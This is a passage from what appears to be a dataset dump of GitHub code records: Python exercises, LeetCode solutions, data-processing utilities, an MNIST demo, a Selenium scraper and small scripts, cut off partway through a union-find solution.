f\"\"\n\n\ndef main():\n config_maps = {\n \"config.site_url\": site_url(),\n \"config.repo_url\": repo_url(),\n }\n\n with open(MAIN_INDEX_PATH, \"r\") as inp, open(GITHUB_README_PATH, \"w\") as out:\n out.write(DISCLAIMER_HEADER + \"\\n\\n\")\n lines = iter(inp.readlines())\n for original_line in lines:\n line = original_line\n\n # remove images\n line = re.sub(r\"!\\[.*\\]\\(.*\\)\", \"\", line)\n\n # adapt local URLs\n line = re.sub(r\"\\./([0-9A-Za-z/_]+)\\.md\", rf\"{BASE_URL}\\1\", line)\n\n # replace config macros\n line = re.sub(r\"{{ ([0-9A-Za-z._]+) }}\", lambda match: config_maps[match.group(1)], line)\n\n # adapt admonitions\n if line.startswith(\"!!!\"):\n # NOTE: we are assuming admonitions never have images or local URLs\n\n for line in lines:\n if line == \"\\n\":\n out.write(\"\\n\")\n elif line.startswith(4 * \" \"):\n out.write(\"> \" + line[4:])\n else:\n break\n\n if original_line == line or line != \"\\n\":\n out.write(line)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CarlosBergillos/LocationHistoryFormat","sub_path":"tools/github_readme/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"1431052064","text":"# -*- coding: utf-8 -*-\n\ndef calc_sum(*args):\n ax = 0\n for n in args:\n ax = ax + n\n return ax\n\ndef lazy_sum(*args):\n def sum():\n ax = 0\n for n in args:\n ax = ax +n\n return ax\n\n return sum\n\nf1=lazy_sum(1,2,3,4,5)\nf2=lazy_sum(1,2,3,4,5)\nprint(f1)\nprint(f2)\n\n\n#def count():\n# fs=[]\n# for i in range(1,4):\n# def f():\n# return i * i\n# fs.append(f)\n# return fs\n\ndef count():\n def f(j):\n def g():\n return j*j\n return g\n\n fs = []\n\n for i in range(1,4):\n fs.append(f(i))\n return fs\n\n\nf1,f2,f3=count()\nprint(f1())\nprint(f2())\nprint(f3())\n\n\n\n\ndef createCounter():\n L = [0]\n def counter():\n L[0] = L[0] + 1\n return L[0]\n return counter\n\n\n# 测试:\ncounterA = createCounter()\nprint(counterA(), counterA(), counterA(), counterA(), counterA()) # 1 2 3 4 5\ncounterB = createCounter()\nif [counterB(), counterB(), counterB(), counterB()] == [1, 2, 3, 4]:\n print('测试通过!')\nelse:\n print('测试失败!')\n\n\n\n\n","repo_name":"kumaeki/python_introduction","sub_path":"do_fu_returnFunction.py","file_name":"do_fu_returnFunction.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72958172673","text":"\"\"\"\n给定一个二叉树,找出其最大深度。\n\n二叉树的深度为根节点到最远叶子节点的最长路径上的节点数。\n\"\"\"\n# Definition for a binary tree node.\nfrom collections import deque\nfrom typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def maxDepth(self, root: Optional[TreeNode]) -> int:\n res = 0\n q = deque()\n if not root:\n return res\n q.append(root)\n while q:\n res += 1\n print(res)\n for i in range(len(q)):\n node = q.popleft()\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n\n return res\n","repo_name":"SsuperL/leetcode-practice","sub_path":"simple/exercise_104.py","file_name":"exercise_104.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13856102819","text":"class Solution:\n def trap(self, height: List[int]) -> int:\n \n n = len(height)\n \n left = []\n max_l = 0\n \n for i in range(n):\n if height[i] > max_l:\n max_l = height[i]\n left.append(max_l)\n \n max_r = 0\n right = []\n \n for i in range(n-1,-1,-1):\n if height[i] > max_r:\n max_r = height[i]\n right = [max_r] + right \n \n\n res = 0\n\n for i in range(n):\n min_peak = min(left[i],right[i])\n\n if min_peak > height[i]:\n res += min_peak-height[i]\n \n return res\n\n##-------------------------stack method---------------------------------##\nclass Solution(object):\n def trap(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n \n stack = []\n count = 0\n \n for i in range(len(height)):\n while stack and height[stack[-1]] < height[i]:\n fill_ind = stack.pop()\n \n if stack:\n count += (min(height[i],height[stack[-1]])-height[fill_ind]) * (i-stack[-1]-1)\n \n stack.append(i)\n \n return count","repo_name":"brichi15/Coding-Practice","sub_path":"Trapping rain water.py","file_name":"Trapping rain water.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11215738699","text":"\"\"\"\r\nОпрос: Возьмите за основу код favorite_languages.py (с. 106).\r\n• Создайте список людей, которые должны участвовать в опросе по поводу \r\nлюбимого языка программирования. Включите некоторые имена, которые уже \r\nприсутствуют в списке, и некоторые имена, которых в списке еще нет.\r\n• Переберите список людей, которые должны участвовать в опросе. Если они\r\nуже прошли опрос, выведите сообщение с благодарностью за участие. Если \r\nони еще не проходили опрос, выведите сообщение с предложением принять \r\nучастие.\r\n\"\"\"\r\n\r\nfavorite_languages = {\r\n 'jen': 'python',\r\n 'sarah': 'c',\r\n 'edward': 'ruby',\r\n 'phil': 'python',\r\n }\r\n\r\npool_names = ['alex', 'jen', 'edward', 'max', 'john',]\r\n\r\nfor name in pool_names:\r\n if name in favorite_languages.keys():\r\n print(name.title() + \", спасибо за участие!\")\r\n else:\r\n print(name.title() + \", примите участие в опросе!\")","repo_name":"AlexProvatorov/python_crash_course","sub_path":"topic_6/ex_6.6.py","file_name":"ex_6.6.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74024706754","text":"import sys\n\ndef usage():\n\tprint (\"Search the keyword in the document.\")\n\tprint (\"python3 search_key.py \")\n\texit(1)\n\ndef main():\n\tif len(sys.argv) != 3:\n\t\tusage()\n\n\ttry:\n\t\tf = open(sys.argv[1], \"r\")\n\t\tkey = sys.argv[2]\n\n\t\ttmp1 = f.read()\n\t\ttmp2 = tmp1.split(\"\\n\")\n\n\t\tprint (\"lines: \", len(tmp2))\n\n\t\tfor e in tmp2:\n\t\t\tif key in e:\n\t\t\t\tprint (e)\n\n\t\tf.close()\n\texcept:\n\t\tprint (\"No Such File: %s\" % sys.argv[1])\n\t\tprint (\"Please try again.\")\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"hw5773/matls","sub_path":"scripts/search_key.py","file_name":"search_key.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11216333190","text":"#\n# [64] Minimum Path Sum\n#\n# https://leetcode.com/problems/minimum-path-sum/description/\n#\n# algorithms\n# Medium (40.29%)\n# Total Accepted: 140.6K\n# Total Submissions: 349K\n# Testcase Example: '[[1,3,1],[1,5,1],[4,2,1]]'\n#\n# Given a m x n grid filled with non-negative numbers, find a path from top\n# left to bottom right which minimizes the sum of all numbers along its path.\n# \n# Note: You can only move either down or right at any point in time.\n# \n# Example 1:\n# \n# [[1,3,1],\n# ⁠[1,5,1],\n# ⁠[4,2,1]]\n# \n# Given the above grid map, return 7. Because the path 1→3→1→1→1 minimizes the\n# sum.\n# \n#\nclass Solution(object):\n def minPathSum(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n rows = len(grid)\n cols = len(grid[0])\n \n # initialization\n dp = [[0 for j in xrange(cols)] for i in xrange(rows)]\n dp[0][0] = grid[0][0]\n for i in xrange(1, cols):\n dp[0][i] = dp[0][i - 1] + grid[0][i]\n for i in xrange(1, rows):\n dp[i][0] = dp[i - 1][0] + grid[i][0]\n \n # dynamic programming\n for i in xrange(1, rows):\n for j in xrange(1, cols):\n dp[i][j] = min(dp[i - 1][j], dp[i][j - 1]) + grid[i][j]\n return dp[rows - 1][cols - 1]\n","repo_name":"goalong/lc","sub_path":"v1/64.minimum-path-sum.106833375.ac.py","file_name":"64.minimum-path-sum.106833375.ac.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"6620452053","text":"import os\nfrom shutil import copyfile\n\nimport numpy as np\nimport pandas as pd\n\nfrom configs import cfg\n\nnp.random.seed(2018)\n\n\ndef random_split_data(all_data_file, dataset_name, vt_ratio=0.1, u_f=None,i_f=None):\n \"\"\"\n 随机切分已经生成的数据集文件 *.all.csv -> *.train.csv,*.validation.csv,*.test.csv\n :param all_data_file: 数据预处理完的文件 *.all.csv\n :param dataset_name: 给数据集起个名字\n :param vt_ratio: 验证集合测试集比例\n :param u_f: 用户特征文件 *.user.csv\n :param i_f: 物品特征文件 *.item.csv\n :return: pandas dataframe 训练集,验证集,测试集\n \"\"\"\n dir_name = os.path.join(cfg.DATASET_DIR, dataset_name)\n print('random_split_data', dir_name)\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n all_data = pd.read_csv(all_data_file, sep='\\t')\n vt_size = int(len(all_data) * vt_ratio)\n validation_set = all_data.sample(n=vt_size).sort_index()\n all_data = all_data.drop(validation_set.index)\n test_set = all_data.sample(n=vt_size).sort_index()\n train_set = all_data.drop(test_set.index)\n train_set.to_csv(os.path.join(dir_name, dataset_name + '.train.csv'),\n index=False, sep='\\t')\n validation_set.to_csv(os.path.join(dir_name, dataset_name +\n '.validation.csv'), index=False, sep='\\t')\n test_set.to_csv(os.path.join(dir_name, dataset_name + '.test.csv'),\n index=False, sep='\\t')\n if u_f is not None:\n copyfile(u_f, os.path.join(dir_name, dataset_name + '.user.csv'))\n if i_f is not None:\n copyfile(i_f, os.path.join(dir_name, dataset_name + '.item.csv'))\n return train_set, validation_set, test_set\n\n\ndef leave_out_by_time(all_data_file, dataset_name, leave_n=1, warm_n=5, u_f\n =None, i_f=None):\n \"\"\"\n Split train/validation/test by timestamp.\n By default, the interactions in all_data_file are already sorted by timestamp.\n :param all_data_file: preprocessed dataset file *.all.csv,which is sorted by timestamp.\n :param dataset_name: dataset name (used as the processed dataset name)\n :param leave_n: number of items that are left in validation and test set.\n :param warm_n: minimum number of interactions to leave in training dataset for each user.\n :param u_f: user feature file (not used here)\n :param i_f: item feature file (not used here)\n :return: pandas dataframe for training/validation/test sets\n \"\"\"\n dir_name = os.path.join(cfg.DATASET_DIR, dataset_name)\n print('leave_out_by_time', dir_name, leave_n, warm_n)\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n all_data = pd.read_csv(all_data_file, sep='\\t')\n min_label = all_data['label'].min()\n if min_label > 0:\n \"\"\"\n Keep at least 'warm_n' number of interactions in training dataset. \n If user has less than 'warm_n' interactions, then keep all the interactions in training set.\n This is to guarantee that no cold start issue for validation and testing.\n \"\"\"\n train_set = all_data.groupby('uid').head(warm_n)\n all_data = all_data.drop(train_set.index)\n test_set = all_data.groupby('uid').tail(leave_n)\n all_data = all_data.drop(test_set.index)\n validation_set = all_data.groupby('uid').tail(leave_n)\n all_data = all_data.drop(validation_set.index)\n else:\n \"\"\"\n Keep at least 'warm_n' number of interactions in training dataset. \n If user has less than 'warm_n' interactions, then keep all the interactions in training set.\n This is to guarantee that no cold start issue for validation and testing.\n \"\"\"\n train_set = []\n for uid, group in all_data.groupby('uid'):\n found, found_idx = 0, -1\n for idx in group.index:\n if group.loc[idx, 'label'] > 0:\n found_idx = idx\n found += 1\n if found >= warm_n:\n break\n if found_idx > 0:\n train_set.append(group.loc[:found_idx + 1])\n train_set = pd.concat(train_set)\n all_data = all_data.drop(train_set.index)\n test_set = []\n for uid, group in all_data.groupby('uid'):\n found, found_idx = 0, -1\n for idx in reversed(group.index):\n if group.loc[idx, 'label'] > 0:\n found_idx = idx\n found += 1\n if found >= leave_n:\n break\n if found_idx > 0:\n test_set.append(group.loc[found_idx:])\n test_set = pd.concat(test_set)\n all_data = all_data.drop(test_set.index)\n validation_set = []\n for uid, group in all_data.groupby('uid'):\n found, found_idx = 0, -1\n for idx in reversed(group.index):\n if group.loc[idx, 'label'] > 0:\n found_idx = idx\n found += 1\n if found >= leave_n:\n break\n if found_idx > 0:\n validation_set.append(group.loc[found_idx:])\n validation_set = pd.concat(validation_set)\n all_data = all_data.drop(validation_set.index)\n train_set = pd.concat([train_set, all_data]).sort_index()\n validation_set, test_set = validation_set.sort_index(\n ), test_set.sort_index()\n train_set.to_csv(os.path.join(dir_name, dataset_name + '.train.csv'),\n index=False, sep='\\t')\n validation_set.to_csv(os.path.join(dir_name, dataset_name +\n '.validation.csv'), index=False, sep='\\t')\n test_set.to_csv(os.path.join(dir_name, dataset_name + '.test.csv'),\n index=False, sep='\\t')\n if u_f is not None:\n copyfile(u_f, os.path.join(dir_name, dataset_name + '.user.csv'))\n if i_f is not None:\n copyfile(i_f, os.path.join(dir_name, dataset_name + '.item.csv'))\n return train_set, validation_set, test_set\n","repo_name":"gsq7474741/Paddle-NCR","sub_path":"utils/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30880865401","text":"# 2018/2/25\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom inspect import currentframe, getframeinfo\n\n\ndef get_linenumber():\n cf = currentframe()\n return cf.f_back.f_lineno\n\n\ndef get_filename():\n cf = currentframe()\n return getframeinfo(cf).filename\n\ndef get_mnist_data():\n mnist = input_data.read_data_sets(MINIST_DATA_PATH, one_hot=True);\n print(\"Train: \", mnist.train.images.shape, mnist.train.labels.shape);\n print(\"Test: \", mnist.test.images.shape, mnist.test.labels.shape);\n print(\"Validation: \", mnist.validation.images.shape, mnist.validation.labels.shape);\n return mnist\n\nprint(tf.__version__)\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nMINIST_DATA_PATH = \"./minist_data/\";\nprint(MINIST_DATA_PATH);\nprint(get_filename(),get_linenumber())\n\nsess = tf.InteractiveSession()\nlayer2_size = 784;\nin_units = 784\nh1_units = 300\n\n# Define y = W*x+b\nwith tf.name_scope('Net'):\n W1 = tf.Variable(tf.truncated_normal([in_units, h1_units], stddev=0.1), name='W1');\n b1 = tf.Variable(tf.zeros([h1_units]), name=\"b1\");\n W2 = tf.Variable(tf.zeros([h1_units, 10]), name=\"W2\");\n b2 = tf.Variable(tf.zeros([10]), name=\"b2\");\n x = tf.placeholder(tf.float32, [None, in_units], name='input_x');\n\n keep_prob = tf.placeholder(tf.float32);\n hidden1 = tf.nn.relu(tf.matmul(x, W1) + b1)\n hidden1_drop = tf.nn.dropout(hidden1, keep_prob);\n y = tf.nn.softmax(tf.matmul(hidden1_drop, W2) + b2);\n y_ = tf.placeholder(tf.float32, [None, 10])\n\n # Define cross entropy\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]), name='cross_entropy');\n train_step = tf.train.GradientDescentOptimizer(0.3).minimize(cross_entropy);\nprint(get_filename(),get_linenumber())\n\ntf.summary.FileWriter(\"logs_nlp/\", sess.graph)\n\ntf.global_variables_initializer().run();\n\nsess = tf.Session()\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1));\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32));\n# Get Mnist data\nmnist = get_mnist_data()\nplot_y=[]\nplot_x=[]\nfor i in range(3000):\n batch_xs, batch_ys = mnist.train.next_batch(10000);\n train_step.run({x: batch_xs, y_: batch_ys, keep_prob: 0.75});\n plot_acc = accuracy.eval({x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0})\n plot_x.append(i)\n plot_y.append(plot_acc)\n print(\"Inter \", i, \", accuracy = \", plot_acc);\nprint(\"===================\");\n\nplt.plot(plot_x,plot_y)\nplt.xlabel('train_step')\nplt.ylabel('acc')\nplt.show()\n\nprint(accuracy.eval({x: mnist.test.images, y_: mnist.test.labels, keep_prob:1.0}));\nprint(mnist)\n","repo_name":"ziv-lin/Learning_tf","sub_path":"mnist/demo_mnist_nlp.py","file_name":"demo_mnist_nlp.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28904156436","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import setup, find_packages\n\nrequirements = [\n 'cffi',\n 'wrapt',\n 'six',\n \"enum34 ; python_version < '3.4'\"\n]\n\nsetup_requirements = []\n\ntest_requirements = ['pytest', 'tox', 'virtualenv']\n\nsetup(\n author=\"Soul Melody\",\n classifiers=[\n 'Development Status :: 1 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Natural Language :: English',\n 'Python :: Implementation :: PyPy',\n ],\n description=\"Cffi wrapper of DOtherSide for pypy\",\n install_requires=requirements,\n license=\"GNU General Public License v3\",\n include_package_data=True,\n keywords='PyQuick',\n name='PyQuick',\n packages=find_packages(include=['PyQuick']),\n setup_requires=setup_requirements,\n test_suite='tests',\n tests_require=test_requirements,\n url='https://github.com/SoulMelody/PyQuick',\n version='0.0.1',\n zip_safe=False,\n)\n","repo_name":"SoulMelody/PyQuick","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31532348438","text":"from PIL import Image\r\nfrom PIL import PSDraw\r\n\r\n\r\ncatIm = Image.open('zophie.png')\r\ncatCopyIm=catIm.copy()\r\n\r\n\r\n\r\ncatIm=catIm.resize((600,800), Image.ANTIALIAS)\r\n\r\nwidth=catIm.size[0]\r\nheight=catIm.size[1]\r\n\r\nim = Image.new('RGBA', (100, 200), 'purple')\r\n\r\ncatIm.save('newzophie.png')\r\n\r\nim.save('im.png')\r\n\r\ncroppedIm = catIm.crop((235, 245, 465, 460))\r\ncroppedIm=croppedIm.resize((100,100), Image.ANTIALIAS)\r\ncroppedIm.save('cropped.png')\r\ncroppedIm.rotate(270).save('rotated270.png')\r\nrotated270=Image.open('rotated270.png')\r\n\r\n\r\ncatCopyIm.paste(croppedIm,(50,50))\r\ncatCopyIm.paste(croppedIm,(280,350))\r\ncatCopyIm.paste(rotated270, (50,350))\r\ncatCopyIm.save('catCopyIm.png')\r\n\r\nSQUARE_FIT_SIZE = 300\r\nLOGO_FILENAME= 'logocat.png'\r\n\r\nlogoim=Image.open(LOGO_FILENAME)\r\nlogowidth, logoheight = logoim.size\r\n\r\ncatCopyIm.paste(logoim, (width - logowidth, height - logoheight), logoim)\r\n\r\nprint (\"Width: \",width,\" Height: \",height)\r\n\r\n","repo_name":"geoakr84/python_project","sub_path":"postscript.py3","file_name":"postscript.py3","file_ext":"py3","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4264264844","text":"N, M = [int(i) for i in input().split()]\nP, R = [int(i) for i in input().split()]\ninfectados = []\ninfectados.append(P)\n\nfor i in range(1,M+1):\n reuniao = [int(j) for j in input().split()[1:]]\n if(i > R-1):\n if any(pessoa in infectados for pessoa in reuniao):\n infectados.extend([pessoa for pessoa in reuniao if pessoa not in infectados])\n\nprint(len(infectados))\n","repo_name":"claytonmaciel/obi","sub_path":"obi 2020/2020 - P2F1 - pandemia - 1.py","file_name":"2020 - P2F1 - pandemia - 1.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"pt","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"72281341954","text":"import time\r\nimport os\r\nimport xlsxwriter\r\nimport fitz\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import Select, WebDriverWait\r\n\r\n\r\ndef wait_for_downloads(path):\r\n print('Waiting for downloads', end='')\r\n while any([filename.endswith('.crdownload') for filename in\r\n os.listdir(path)]):\r\n time.sleep(2)\r\n print(\".\", end=\"\")\r\n print('\\nAll files downloaded!')\r\n\r\n\r\ndef parse_pdf_data(filename):\r\n doc = fitz.open(filename)\r\n investment_name = '1. Name of this Investment:'\r\n uii = '2. Unique Investment Identifier (UII):'\r\n page = doc.load_page(0)\r\n page_text = page.get_text(\"text\")\r\n values = []\r\n for line in page_text.split('\\n'):\r\n if uii in line:\r\n values.append(line.split(':')[1].strip())\r\n elif investment_name in line:\r\n values.append(line.split(':')[1].strip())\r\n return values\r\n\r\n\r\ndef main():\r\n print('Initialize.')\r\n\r\n with open('config.txt') as file:\r\n dep_to_scrap = file.readline().strip()\r\n chrome_options = webdriver.ChromeOptions()\r\n prefs = {'download.default_directory': f'{os.getcwd()}/output'}\r\n chrome_options.add_experimental_option('prefs', prefs)\r\n chrome_options.add_argument('--headless')\r\n chrome_options.add_argument('--no-sandbox')\r\n chrome_options.add_argument('--disable-dev-shm-usage')\r\n driver = webdriver.Chrome(options=chrome_options)\r\n\r\n print(f'Start!\\nDepartment to search:{dep_to_scrap}')\r\n driver.get('https://itdashboard.gov/')\r\n dive_it = driver.find_element(By.XPATH, \"//*[@id='node-23']/div/div/div/div/div/div/div/a\")\r\n dive_it.click()\r\n print('Click on \"Dive in\"!')\r\n deps = WebDriverWait(driver, 10).until(EC.visibility_of_all_elements_located(\r\n (By.XPATH, '//div[@id=\"agency-tiles-widget\"]//span[@class=\"h4 w200\"]')))\r\n budgets = driver.find_elements(By.XPATH, '//div[@id=\"agency-tiles-widget\"]//span[@class=\" h1 w900\"]')\r\n\r\n workbook = xlsxwriter.Workbook('output/write_data.xlsx')\r\n worksheet = workbook.add_worksheet(name=\"Departments\")\r\n worksheet.set_column(0, 0, 45)\r\n for row_num, data in enumerate(deps):\r\n worksheet.write(row_num, 0, data.text)\r\n for row_num, data in enumerate(budgets):\r\n worksheet.write(row_num, 1, data.text)\r\n print('Departments budgets: Done!')\r\n\r\n driver.find_element(By.XPATH, f\"//span[contains(text(), '{dep_to_scrap}')]\").click()\r\n select = Select(WebDriverWait(driver, 10).until(\r\n EC.visibility_of_element_located((By.XPATH, '//*[@id=\"investments-table-object_length\"]/label/select'))))\r\n select.select_by_value('-1')\r\n print('Show all entries.')\r\n time.sleep(15)\r\n\r\n tmp_table = []\r\n for i in driver.find_elements(By.XPATH, '//*[@id=\"investments-table-object\"]//tr'):\r\n if i.text != '':\r\n tmp_table.append(i.text)\r\n\r\n table = driver.find_elements(By.XPATH, '//*[@id=\"investments-table-object\"]//tr//td')\r\n agencies = workbook.add_worksheet(\"Agencies\")\r\n agencies.set_column(0, 0, 15)\r\n agencies.set_column(1, 1, 45)\r\n agencies.set_column(2, 2, 40)\r\n agencies.set_column(4, 4, 30)\r\n row_num = 0\r\n col_num = 0\r\n for data in table:\r\n if data.text != '':\r\n if col_num == 7:\r\n row_num += 1\r\n col_num = 0\r\n agencies.write(row_num, col_num, data.text)\r\n col_num += 1\r\n workbook.close()\r\n print('Excel file is done!')\r\n\r\n urls = driver.find_elements(By.XPATH, '//*[@id=\"investments-table-object\"]//tr//a')\r\n links = []\r\n for url in urls:\r\n links.append(url.get_attribute(\"href\"))\r\n for link in links:\r\n driver.get(link)\r\n button = WebDriverWait(driver, 10).until(EC.visibility_of_element_located(\r\n (By.XPATH, '//*[@id=\"business-case-pdf\"]/a')))\r\n driver.execute_script(\"arguments[0].click();\", button)\r\n print('Downloading file.')\r\n time.sleep(10)\r\n\r\n wait_for_downloads('output')\r\n\r\n file_list = []\r\n for file in os.listdir('output'):\r\n if file.endswith('.pdf'):\r\n file_list.append(os.path.join('output', file))\r\n for file in file_list:\r\n v = parse_pdf_data(file)\r\n print(f'Checking entries {v[1]}: {v[0]}')\r\n for element in tmp_table:\r\n if v[0] and v[1] in element:\r\n print('UII and Name of Investment are same!')\r\n\r\n driver.close()\r\n print('Browser closed!')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"ivannikovoleg/FPT_RPA","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23925827367","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 15 10:35:18 2022\n\n@author: zak\n\"\"\"\n\nimport dash\nfrom dash import html\nfrom dash.dependencies import Input, Output\n\napp = dash.Dash()\n\n\n\n\napp.layout = html.Div(id = 'parent', children = [\n \n html.Button(id = 'html-button', children = 'Click the button', n_clicks = 0),\n \n html.Br(),\n \n html.Div(id = 'output-text')\n \n \n \n ])\n\n@app.callback(Output(component_id = 'output-text', component_property = 'children'),\n Input(component_id = 'html-button', component_property = 'n_clicks') \n )\n\ndef button_update(value):\n return html.Div(str(value) + ' Clicks!')\n\n\nif __name__ == '__main__':\n app.run_server()\n \n \n ","repo_name":"ZakWrench/Archived","sub_path":"Python/Plotly.Dash/plotly_dash_basics/html_button_callbacks.py","file_name":"html_button_callbacks.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4611492800","text":"# https://docs.python.org/3/library/random.html\n\nimport random as rnd\n\n\ndef show(message, func, *args, **kvarg):\n print(message)\n for _ in range(20):\n print(func(*args, **kvarg), end=\" \")\n print(\"\\n\\n\")\n\n\ndef my_shuffle(my_list):\n rnd.shuffle(my_list)\n return my_list\n\n\nshow(\"random:\", rnd.random) # [0,1]\nshow(\"uniform:\", rnd.uniform, 10.0, 20.0) # [A,B]\nshow(\"randrange:\", rnd.randrange, 10, 60) # нижняя граница < верхней\nshow(\"randint:\", rnd.randint, 10, 60) # нижняя граница <= верхней\nshow(\"getrandbits:\", rnd.getrandbits, 100) # сгенерировать случайные 100 бит\nshow(\"choice:\", rnd.choice, [-10, -10, -20]) # выбрать случайный элемент\nshow(\"choices:\", rnd.choices, population=[1, 2, 3, 4, 5, 6, 7, 8, 9, 0], k=3)\nshow(\"sample:\", rnd.sample, [1, 2, 3, 4, 5, 6], k=6) # k <= len(list)\nshow(\"shuffle:\", my_shuffle, [1, 2, 3, 4, 5, 6])\nshow(\"gauss:\", rnd.gauss, mu=10, sigma=60)\nshow(\"lognormvariate:\", rnd.lognormvariate, mu=10, sigma=60)\nshow(\"normalvariate:\", rnd.normalvariate, mu=10, sigma=20)\nshow(\"vonmisesvariate:\", rnd.vonmisesvariate, mu=10, kappa=60)\nshow(\"paretovariate:\", rnd.paretovariate, alpha=10)\nshow(\"weibullvariate:\", rnd.weibullvariate, alpha=10, beta=60)\n\n\ndef gen_key_1(key_len):\n key = [i for i in range(1, key_len + 1)]\n rnd.shuffle(key)\n return key\n\n\ndef gen_key_2(key_len):\n key = []\n key_values = []\n for i in range(1, key_len + 1):\n key_values.append(i)\n while(True):\n key_id = rnd.randrange(0, len(key_values))\n key_elem = key_values[key_id]\n if key_elem not in key:\n del key_values[key_id]\n key.append(key_elem)\n if len(key) == key_len:\n break\n else:\n print(\"error!\")\n return key\n\n\nprint(gen_key_2(10))\n","repo_name":"1xdeadman/examples","sub_path":"4_modules/module_random.py","file_name":"module_random.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23410789201","text":"import sys\n\n# get the file\nf = open(sys.argv[1])\n\n# how many to examine\ncount = int(f.readline().strip())\n\n# to list\nr = []\nfor l in f:\n\tz = l.strip().split()\n\tr.append([int(x) for x in z])\n\n\n# use the remaining lines\nfor i in range(count):\n\ta = r[(10*i)+r[10*i][0]]\n\tb = r[(10*i)+5+r[10*i+5][0]]\n\n\tc = 0\n\tans = 0\n\tfor d in a:\n\t\tif d in b:\n\t\t\tc += 1\n\t\t\tans = d\n\tif c == 1:\n\t\tprint(\"Case #\" + str(i+1) + \": \" + str(ans))\n\telif c == 0:\n\t\tprint(\"Case #\" + str(i+1) + \": Volunteer cheated!\")\n\telse:\n\t\tprint(\"Case #\" + str(i+1) + \": Bad magician!\") \n\t\t\n\t\t\n\t\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1441.py","file_name":"1441.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1640608442","text":"\"\"\"\nDefinition for a point.\n\"\"\"\n\n\nclass Point:\n def __init__(self, a=0, b=0):\n self.x = a\n self.y = b\n\n\nclass Solution:\n \"\"\"\n @param n: An integer\n @param m: An integer\n @param operators: an array of point\n @return: an integer array\n \"\"\"\n\n def numIslands2(self, m, n, positions):\n \"\"\"\n :type m: int\n :type n: int\n :type positions: List[List[int]]\n :rtype: List[int]\n \"\"\"\n\n class DSU(object):\n def __init__(self, length):\n self.par = list(range(length))\n self.isLand = [False] * length\n self.rank = [1] * length\n self.count = 0\n\n def find(self, x):\n if self.par[x] != x:\n self.par[x] = self.find(self.par[x])\n return self.par[x]\n\n def union(self, x, y):\n px, py = self.find(x), self.find(y)\n if px == py:\n return False\n if self.rank[px] >= self.rank[py]:\n self.par[py] = px\n self.rank[px] += self.rank[py]\n else:\n self.par[px] = py\n self.rank[py] += self.rank[px]\n self.count -= 1\n return True\n\n def addLand(self, x):\n self.isLand[x] = True\n self.count += 1\n\n def index(x, y):\n return x * n + y\n\n dsu = DSU(m * n)\n res = list()\n directions = 